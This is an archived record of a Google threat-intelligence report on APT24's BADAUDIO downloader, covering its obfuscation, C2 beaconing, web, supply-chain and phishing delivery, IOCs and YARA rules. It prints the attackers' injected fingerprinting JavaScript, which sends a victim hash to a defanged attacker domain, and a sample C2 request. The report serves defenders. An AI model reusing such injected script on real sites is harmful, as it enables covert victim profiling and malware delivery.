{
	"id": "a1d807b7-6853-41dc-bed1-c57ea9ff9f98",
	"created_at": "2026-04-06T00:11:54.070532Z",
	"updated_at": "2026-04-10T13:11:23.334558Z",
	"deleted_at": null,
	"sha1_hash": "927127a9ff37420b191af7b81035bf637fa6ba55",
	"title": "APT24's Pivot to Multi-Vector Attacks",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1486948,
	"plain_text": "APT24's Pivot to Multi-Vector Attacks\r\nBy Google Threat Intelligence Group\r\nPublished: 2025-11-20 · Archived: 2026-04-05 16:04:58 UTC\r\nWritten by: Harsh Parashar, Tierra Duncan, Dan Perez\r\nGoogle Threat Intelligence Group (GTIG) is tracking a long-running and adaptive cyber espionage campaign by\r\nAPT24, a People's Republic of China (PRC)-nexus threat actor. Spanning three years, APT24 has been deploying\r\nBADAUDIO, a highly obfuscated first-stage downloader used to establish persistent access to victim networks.\r\nWhile earlier operations relied on broad strategic web compromises to compromise legitimate websites, APT24\r\nhas recently pivoted to using more sophisticated vectors targeting organizations in Taiwan. This includes the\r\nrepeated compromise of a regional digital marketing firm to execute supply chain attacks and the use of targeted\r\nphishing campaigns.\r\nThis report provides a technical analysis of the BADAUDIO malware, details the evolution of APT24's delivery\r\nmechanisms from 2022 to present, and offers actionable intelligence to help defenders detect and mitigate this\r\npersistent threat.\r\nAs part of our efforts to combat serious threat actors, GTIG uses the results of our research to improve the safety\r\nand security of Google’s products and users. Upon discovery, all identified websites, domains, and files are added\r\nto the Safe Browsing blocklist in order to protect web users across major browsers. 
We also conducted a series of\r\nvictim notifications with technical details to compromised sites, enabling affected organizations to secure their\r\nsites and prevent future infections.\r\nFigure 1: BADAUDIO campaign overview\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/apt24-pivot-to-multi-vector-attacks/\r\nPage 1 of 11\n\nPayload Analysis: BADAUDIO and Cobalt Strike Beacon Integration\r\nThe BADAUDIO malware is a custom first-stage downloader written in C++ that downloads, decrypts, and\r\nexecutes an AES-encrypted payload from a hard-coded command and control (C2) server. The malware collects\r\nbasic system information, encrypts it using a hard-coded AES key, and sends it as a cookie value with the GET\r\nrequest to fetch the payload. The payload, in one case identified as Cobalt Strike Beacon, is decrypted with the\r\nsame key and executed in memory.\r\nGET https://wispy[.]geneva[.]workers[.]dev/pub/static/img/merged?version=65feddea0367 HTTP/1.1\r\nHost: wispy[.]geneva[.]workers[.]dev\r\nCookie: SSID=0uGjnpPHjOqhpT7PZJHD2WkLAxwHkpxMnKvq96VsYSCIjKKGeBfIKGKpqbRmpr6bBs8hT0ZtzL7/kHc+fyJkIoZ8hDyO8L3V1NF\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n--------------------------\r\nGET\r\ncfuvid=Iewmfm8VY6Ky-3-E-OVHnYBszObHNjr9MpLbLHDxX056bnRflosOpp2hheQHsjZFY2JmmO8abTekDPKzVjcpnedzNgEq2p3YSccJZkjRW\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\nFigure 2: BADAUDIO code sample\r\nThe malware is engineered with control flow flattening—a sophisticated obfuscation technique that systematically\r\ndismantles a program's natural, structured logic. 
This method replaces linear code with a series of disconnected\r\nblocks governed by a central \"dispatcher\" and a state variable, forcing analysts to manually trace each execution\r\npath and significantly impeding both automated and manual reverse engineering efforts.\r\nFigure 3: Control flow flattening heavily obfuscates BADAUDIO malware\r\nBADAUDIO typically manifests as a malicious Dynamic Link Library (DLL) leveraging DLL Search Order\r\nHijacking (MITRE ATT\u0026CK T1574.001) for execution via legitimate applications. Recent variants observed\r\nindicate a refined execution chain: encrypted archives containing BADAUDIO DLLs along with VBS, BAT, and\r\nLNK files.\r\nThese supplementary files automate the placement of the BADAUDIO DLL and a legitimate executable into user\r\ndirectories, establish persistence through legitimate executable startup entries, and trigger the DLL sideloading.\r\nThis multi-layered approach to execution and persistence minimizes direct indicators of compromise.\r\nUpon execution, BADAUDIO collects rudimentary host information: hostname, username, and system\r\narchitecture. This collected data is then hashed and embedded within a cookie parameter in the C2 request header.\r\nThis technique provides a subtle yet effective method for beaconing and identifying compromised systems,\r\ncomplicating network-based detection.\r\nIn one of these cases, the subsequent payload, decrypted using a hard-coded AES key, has been confirmed as\r\nCobalt Strike Beacon. However, it is not confirmed that Cobalt Strike is present in every instance. The Beacon\r\npayload contained a relatively unique watermark that was previously observed in a separate APT24 campaign,\r\nshared in the Indicators of Compromise section. Cobalt Strike watermarks are a unique value generated from and\r\ntied to a given \"CobaltStrike.auth\" file. 
This value is embedded as the last 4 bytes for all BEACON stagers and in\r\nthe embedded configuration for full backdoor BEACON samples.\r\nCampaign Overview: BADAUDIO Delivery Evolves\r\nOver three years, APT24 leveraged various techniques to deliver BADAUDIO, including strategic web\r\ncompromises, repeated supply-chain compromise of a regional digital marketing firm in Taiwan, and spear phishing.\r\nFigure 4: BADAUDIO campaign overview\r\nPublic Strategic Web Compromise Campaign\r\nBeginning in November 2022, we observed over 20 compromised websites spanning a broad array of subjects\r\nfrom regional industrial concerns to recreational goods, suggesting an opportunistic approach to initial access with\r\ntrue targeting selectively executed against visitors the attackers identified via fingerprinting. The legitimate\r\nwebsites were weaponized through the injection of a malicious JavaScript payload.\r\nFigure 5: Strategic web compromise attack flow to deliver BADAUDIO malware\r\nThis script exhibited an initial layer of targeting, specifically excluding macOS, iOS, Android, and various\r\nMicrosoft Internet Explorer/Edge browser variants to focus exclusively on Windows systems. This selectivity\r\nsuggests an adversary immediately narrowing their scope to optimize for a specific, likely high-value, victim\r\nprofile.\r\nThe injected JavaScript performed a critical reconnaissance function by employing the FingerprintJS library to\r\ngenerate a unique browser fingerprint. This fingerprint, transmitted via an HTTP request to an attacker-controlled\r\ndomain, served as an implicit validation mechanism. 
Upon successful validation, the victim was presented with a\r\nfabricated pop-up dialog, engineered to trick the user into downloading and executing BADAUDIO malware.\r\n$(window).ready(function() {\r\n var userAgent = navigator.userAgent;\r\n var isIE = userAgent.indexOf(\"compatible\") \u003e -1 \u0026\u0026 userAgent.indexOf(\"MSIE\") \u003e -1;\r\n var isEdge = userAgent.indexOf(\"Edge\") \u003e -1 \u0026\u0026 !isIE;\r\n var isIE11 = userAgent.indexOf('Trident') \u003e -1 \u0026\u0026 userAgent.indexOf(\"rv:11.0\") \u003e -1;\r\n var isMac = userAgent.indexOf('Macintosh') \u003e -1;\r\n var isiPhone = userAgent.indexOf('iPhone') \u003e -1;\r\n var isFireFox = userAgent.indexOf('Firefox') \u003e -1;\r\n if (!isIE \u0026\u0026 !isEdge \u0026\u0026 !isIE11 \u0026\u0026 !isMac \u0026\u0026 !isiPhone \u0026\u0026 !isFireFox) {\r\n var tag_script = document.createElement(\"script\");\r\n tag_script.type = \"text/javascript\";\r\n tag_script.src = \"https://cdn.jsdelivr.net/npm/@fingerprintjs/fingerprintjs@2/dist/fingerprint2.min.js\";\r\n tag_script.onload = \"initFingerprintJS()\";\r\n document.body.appendChild(tag_script);\r\n if (typeof(callback) !== \"undefined\") {\r\n tag_script.onload = function() {\r\n callback();\r\n }\r\n }\r\n function callback() {\r\n var option = {\r\n excludes: {\r\n screenResolution: true,\r\n availableScreenResolution: true,\r\n enumerateDevices: true\r\n }\r\n }\r\n new Fingerprint2.get(option, function(components) {\r\n var values = components.map(function(component) {\r\n return component.value\r\n })\r\n var murmur = Fingerprint2.x64hash128(values.join(''), 31);\r\n console.log(murmur)\r\n var script_tag = document.createElement(\"script\");\r\n script_tag.setAttribute(\"src\", \"https://www[.]twisinbeth[.]com/query.php?id=\" + murmur);\r\n document.body.appendChild(script_tag);\r\n });\r\n }\r\n }\r\n});\r\nFigure 6: 
Early malicious fingerprinting JS used in strategic web compromise campaigns\r\nFigure 7: Example of attacker fake update pop-up dialog impersonating Chrome to lure targets to download and\r\nexecute BADAUDIO malware\r\nThe attackers consistently shift their infrastructure, using a mix of newly registered domains and domains they\r\nhave previously compromised. We last observed this tactic in early September 2025.\r\nEscalation: Supply Chain Compromise for Strategic Web Compromises at Scale\r\nIn July 2024, APT24 compromised a regional digital marketing firm in Taiwan, a supply chain attack that\r\nimpacted more than 1,000 domains. Notably, the firm experienced multiple re-compromises over the last year,\r\ndemonstrating APT24's persistent commitment to the operation.\r\nWe initiated a multifaceted remediation effort to disrupt these threats. In addition to developing custom logic to\r\nidentify and block the modified, malicious JavaScript, GTIG distributed victim notifications to the individual\r\ncompromised websites and the compromised marketing firm. These notifications provided specific details about\r\nthe threat and the modifications made to the original script, enabling affected organizations to secure their sites\r\nand prevent future infections.\r\nIn the first iteration of the supply chain compromise, APT24 injected the malicious script into a widely used\r\nJavaScript library (MITRE ATT\u0026CK T1195.001) provided by the firm, leveraging a typosquatting domain to\r\nimpersonate a legitimate Content Delivery Network (CDN). 
The deobfuscated JavaScript reveals a multi-stage\r\ninfection chain:\r\nDynamic Dependency Loading: The script dynamically loads legitimate jQuery and FingerprintJS2\r\nlibraries (MITRE ATT\u0026CK T1059.007) from a public CDN if not already present, ensuring consistent\r\nexecution across diverse web environments.\r\nMulti-Layer JS Concealment: During a re-compromise discovered in July 2025, the adversary took\r\nadditional steps to hide their malicious code. The highly obfuscated script (MITRE ATT\u0026CK T1059) was\r\ndeliberately placed within a maliciously modified JSON file served by the vendor, which was then loaded\r\nand executed by another compromised JavaScript file. This tactic effectively concealed the final payload in\r\na file type and structure not typically associated with code execution.\r\nAdvanced Fingerprinting: FingerprintJS2 is utilized to generate an x64hash128 browser and environmental\r\nfingerprint (MITRE ATT\u0026CK T1082). The x64hash128 is the resulting 128-bit hash value produced by\r\nthe MurmurHash3 algorithm, which processes a large input string of collected browser characteristics\r\n(such as screen resolution, installed fonts, and GPU details) to create a unique, consistent identifier for the\r\nuser's device.\r\nCovert Data Exfiltration and Staging: A POST request, transmitting Base64-encoded reconnaissance data\r\n(including host, url, useragent, fingerprint, referrer, time, and a unique identifier), is sent to an attacker's\r\nendpoint (MITRE ATT\u0026CK T1041).\r\nAdaptive Payload Delivery: Successful C2 responses trigger the dynamic loading of a subsequent script\r\nfrom a URL provided in the response's data field. 
This cloaked redirect leads to BADAUDIO landing\r\npages, contingent on the attacker's C2 logic and fingerprint assessment (MITRE ATT\u0026CK T1105).\r\nTailored Targeting: The compromise in June 2025 initially employed conditional script loading based on a\r\nunique web ID (the specific domain name) related to the website using the compromised third-party\r\nscripts. This suggests tailored targeting, limiting the strategic web compromise (MITRE ATT\u0026CK T1189)\r\nto a single domain. However, for a ten-day period in August, the conditions were temporarily lifted,\r\nallowing all 1,000 domains using the scripts to be compromised before the original restriction was\r\nreimposed.\r\nFigure 8: Compromised JS supply chain attack to deliver BADAUDIO malware\r\nTargeted Phishing Campaigns\r\nComplementing their broader web-based attacks, APT24 concurrently conducted highly targeted social\r\nengineering campaigns. Lures, such as an email purporting to be from an animal rescue organization, leveraged\r\nsocial engineering to elicit user interaction and drive direct malware downloads from attacker-controlled domains.\r\nSeparate campaigns abused legitimate cloud storage platforms including Google Drive and OneDrive to distribute\r\nencrypted archives containing BADAUDIO. Google protected users by diverting these messages to spam,\r\ndisrupting the threat actor’s effort to leverage reputable services in their campaigns.\r\nAPT24 included pixel tracking links, confirming email opens and potentially validating target interest for\r\nsubsequent exploitation. 
This dual-pronged approach—leveraging widely trusted cloud services and explicit\r\ntracking—enhances their ability to conduct effective, personalized campaigns.\r\nOutlook\r\nThis nearly three-year campaign is a clear example of the continued evolution of APT24’s operational capabilities\r\nand highlights the sophistication of PRC-nexus threat actors. The use of advanced techniques like supply chain\r\ncompromise, multi-layered social engineering, and the abuse of legitimate cloud services demonstrates the actor's\r\ncapacity for persistent and adaptive espionage. \r\nThis activity follows a broader trend GTIG has observed of PRC-nexus threat actors increasingly employing\r\nstealthy tactics to avoid detection. GTIG actively monitors ongoing threats from actors like APT24 to protect users\r\nand customers. As part of this effort, Google continuously updates its protections and has taken specific action\r\nagainst this campaign.\r\nWe are committed to sharing our findings with the security community to raise awareness and to disrupt this\r\nactivity. We hope that improved understanding of tactics and techniques will enhance threat hunting capabilities\r\nand lead to stronger user protections across the industry.\r\nAcknowledgements \r\nThis analysis would not have been possible without the assistance from FLARE. 
We would like to specifically\r\nthank Ray Leong, Jay Gibble and Jon Daniels for their contributions to the analysis and detections for\r\nBADAUDIO.\r\nIndicators of Compromise\r\nA Google Threat Intelligence (GTI) collection of related IOCs is available to registered users.\r\nCobalt Strike Beacon Watermark\r\nWatermark_Hash: BeudtKgqnlm0Ruvf+VYxuw==\r\nYARA Rules\r\nrule G_Downloader_BADAUDIO_1 {\r\nmeta:\r\nauthor = \"Google Threat Intelligence Group (GTIG)\"\r\nstrings:\r\n$string_decode = { 0F 28 [1-5] 0F 29 [1-5] 0F 28 [1-5] 0F 28 [1-5] 0F 28 [1-5] 0F 55 ?? 0F 55\r\n$s1 = \"SystemFunction036\" fullword\r\n$s2_b64marker = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\" fullword\r\n$control_flow_obfuscation = { 66 2E 0F 1F 84 00 00 00 00 00 81 [5] 7? ?? 81 [5] 7? ?? 81 [5] 7\r\ncondition:\r\nuint16(0) == 0x5a4d and all of them and #string_decode \u003e 2 and #control_flow_obfuscation \u003e 2\r\n}\r\nrule G_Downloader_BADAUDIO_2 {\r\nmeta:\r\nauthor = \"Google Threat Intelligence Group (GTIG)\"\r\nstrings:\r\n$c_string_decode = { C5 F8 28 [1-24] C5 F8 57 [1-8] 0F 94 [4-128] C5 F8 29 [1-64] C5 F8 29 [1-\r\n$s1 = \"SystemFunction036\" fullword\r\n$s2_b64marker = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\" fullword\r\n$control_flow_obfuscation = { 66 2E 0F 1F 84 00 00 00 00 00 81 [5] 7? ?? 81 [5] 7? ?? 81 [5] 7\r\n$c_part_of_control_flow_obfuscation_and_string_decode = { C5 F8 28 [1-5] 8B 46 ?? C5 F8 57 40\r\ncondition:\r\nuint16(0) == 0x5a4d and all of ($s*) and #control_flow_obfuscation \u003e 2 and ($c_string_decode o\r\n}\r\nrule G_APT_DOWNLOADER_BADAUDIO_3 {\r\n meta:\r\n author = \"Google Threat Intelligence Group (GTIG)\"\r\n strings:\r\n $s1 = \"SystemFunction036\"\r\n $s2 = \"6666666666666666\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\"\r\n $dc1 = { C1 C2 1A ?? ?? C1 C3 15 31 D3 ?? ?? C1 C2 07 }\r\n $dc2 = { C1 C1 1E ?? ?? C1 C6 13 ?? ?? 
C1 C0 0A 31 }\r\n $dc3 = { C1 C5 19 C1 C7 0E 01 ?? ?? ?? 31 EF C1 EB 03 31 }\r\n $dc4 = { C1 C7 0F 8B ?? ?? ?? ?? ?? C1 C3 0D 31 FB C1 EA 0A 31 }\r\n $f1 = { ( 0F 1F 84 00 00 00 00 00 | 66 2E 0F 1F 84 00 00 00 00 00 | 0F 1F 44 00 00 | 0F 1F 40 00 | 0F 1F\r\n $f2 = /\\x0F\\x4C\\xC1\\x3D[\\x01-\\xFF].{3}([\\x70-\\x7f].|\\x0f[\\x80-\\x8f].{4})\\x3D[\\x01-\\xFF].{3}([\\x70-\\x7f].\r\n condition:\r\n all of ($s*) and 3 of ($dc*) and uint16(0) == 0x5A4D and (#f1 \u003e 5 or #f2 \u003e 2) and filesize \u003c 10MB\r\n}\r\nrule G_APT_DOWNLOADER_BADAUDIO_4 {\r\n meta:\r\n author = \"Google Threat Intelligence Group (GTIG)\"\r\n strings:\r\n $p00_0 = {8d4d??e8[4]8b7d??83c6??eb??c745[5]e8[4]8b4d??64890d}\r\n $p00_1 = {568b7c24??8b7424??8b5424??89f1e8[4]f20f1007f20f104f??f20f118e}\r\n condition:\r\n uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and\r\n (\r\n ($p00_0 in (0..1100000) and $p00_1 in (0..990000))\r\n )\r\n}\r\nSource: https://cloud.google.com/blog/topics/threat-intelligence/apt24-pivot-to-multi-vector-attacks/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://cloud.google.com/blog/topics/threat-intelligence/apt24-pivot-to-multi-vector-attacks/"
	],
	"report_names": [
		"apt24-pivot-to-multi-vector-attacks"
	],
	"threat_actors": [
		{
			"id": "6241b9be-9c59-4164-a7f2-c45844b14a56",
			"created_at": "2023-01-06T13:46:38.321506Z",
			"updated_at": "2026-04-10T02:00:02.926657Z",
			"deleted_at": null,
			"main_name": "APT24",
			"aliases": [
				"PITTY PANDA",
				"G0011",
				"Temp.Pittytiger"
			],
			"source_name": "MISPGALAXY:APT24",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "aa73cd6a-868c-4ae4-a5b2-7cb2c5ad1e9d",
			"created_at": "2022-10-25T16:07:24.139848Z",
			"updated_at": "2026-04-10T02:00:04.878798Z",
			"deleted_at": null,
			"main_name": "Safe",
			"aliases": [],
			"source_name": "ETDA:Safe",
			"tools": [
				"DebugView",
				"LZ77",
				"OpenDoc",
				"SafeDisk",
				"TypeConfig",
				"UPXShell",
				"UsbDoc",
				"UsbExe"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "f4f16213-7a22-4527-aecb-b964c64c2c46",
			"created_at": "2024-06-19T02:03:08.090932Z",
			"updated_at": "2026-04-10T02:00:03.6289Z",
			"deleted_at": null,
			"main_name": "GOLD NIAGARA",
			"aliases": [
				"Calcium ",
				"Carbanak",
				"Carbon Spider ",
				"FIN7 ",
				"Navigator ",
				"Sangria Tempest ",
				"TelePort Crew "
			],
			"source_name": "Secureworks:GOLD NIAGARA",
			"tools": [
				"Bateleur",
				"Carbanak",
				"Cobalt Strike",
				"DICELOADER",
				"DRIFTPIN",
				"GGLDR",
				"GRIFFON",
				"JSSLoader",
				"Meterpreter",
				"OFFTRACK",
				"PILLOWMINT",
				"POWERTRASH",
				"SUPERSOFT",
				"TAKEOUT",
				"TinyMet"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434314,
	"ts_updated_at": 1775826683,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/927127a9ff37420b191af7b81035bf637fa6ba55.pdf",
		"text": "https://archive.orkl.eu/927127a9ff37420b191af7b81035bf637fa6ba55.txt",
		"img": "https://archive.orkl.eu/927127a9ff37420b191af7b81035bf637fa6ba55.jpg"
	}
}